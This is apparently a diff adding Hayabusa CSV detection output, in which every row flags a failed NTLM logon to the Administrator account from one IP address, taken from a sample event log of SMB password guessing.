+2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1404fakprYeqGiNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2VfIjtBcXCRlOjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPztyX4J9NV8EldT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 07flrrzWgsVBYaN2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vgkqkC1VvznGxR6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hMn6yDMLgLChJTL6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uSTokOJ31Tj0bLXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyRifC46GrNpTA4x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvNaby30vAT9drAX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wkYSOQ2bD51a4U8l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rqdOquL9Ax01RPPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nqCCiK5arcyRHha6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpyTGZLkAb0w0kgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wa2pXrZKxeZZYKAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dK0N5KeBgCze1YWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g4dHlwZjMzI5wU2s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GzF2ouP5KkRfsxnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSQxMrGlDiAOo6ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gL0rz3p1yG6RhfAT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyChoTSKgJeK6yqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG4I11dwpBM9SM3l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7foAZ5Y1igCbHap | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ATDXUljQwg8WvUVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdmXaJqQMAG2g6Ao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bjame5puT5CDeoIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0FGGVVkckmdURVh6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j0Smqw4cA4wG2Q6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLWloOhUYEQlj6y6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Tuxuykh0j5afeTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeXS6QwYhqJAOeuz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AqFSJCq5bmBW6dj1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DH1zyt1hxTgzajhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rrZxcWjUX4OgYYIb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ExtkYXSJI8F41uvw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sLh1Q3RieOoukiCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kNb2hZDxi4QrbQpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCb1TMlFj2PjH2sA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rgF42C57Nx6F3HU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KZfFH9geIrxVYowJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWz1XeyxywR0o5gS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: og1kItEC6WhqXF37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0KhaJlD6tWwF2ky | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUy0EKmjyD6ZYENA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h3MdGstPPFJDGzwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTs0ZQa6LGrKZKsY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FefzWjMXSvMdvqcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnUt9tPRSXR5mWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dehb4M6pcxi56Bkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tLXHvGiUqZyxax4W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP1gKcf1eeKm0RB1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldbN1odP77n0BOzO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: drRC8qCbPe5e4mdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lBg39AUtzZi6Q4iz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huv5YEPo1n7UiFkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9CLLwao1NDtBulxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SB88EHHhDWhvJI87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBvklueV4MZo3pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: noha7Vw85VfURHik | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wl5eIYvoKpJGUcSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsS3JTLUWcFYvxAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM6hj2bGxC124oZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3IQkVcY5iMTxCRN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v44Kp3lpGKb6Xd4j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1skdEmGlXbzUWk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feaA6lAxWjapFbAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJZjTqY5innWcvSZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymXIp0KTw0vIbB0N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpPJEcLv7BoZaQwT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cz14Cv861RhFh0Pa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H8BklDHdS0cdcbGu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0m5Mznl2khRMj31V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ha6TuN7C8V0roSAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9oBW0yE5a9zSkpIH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n54EaKOUQIX9geqx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
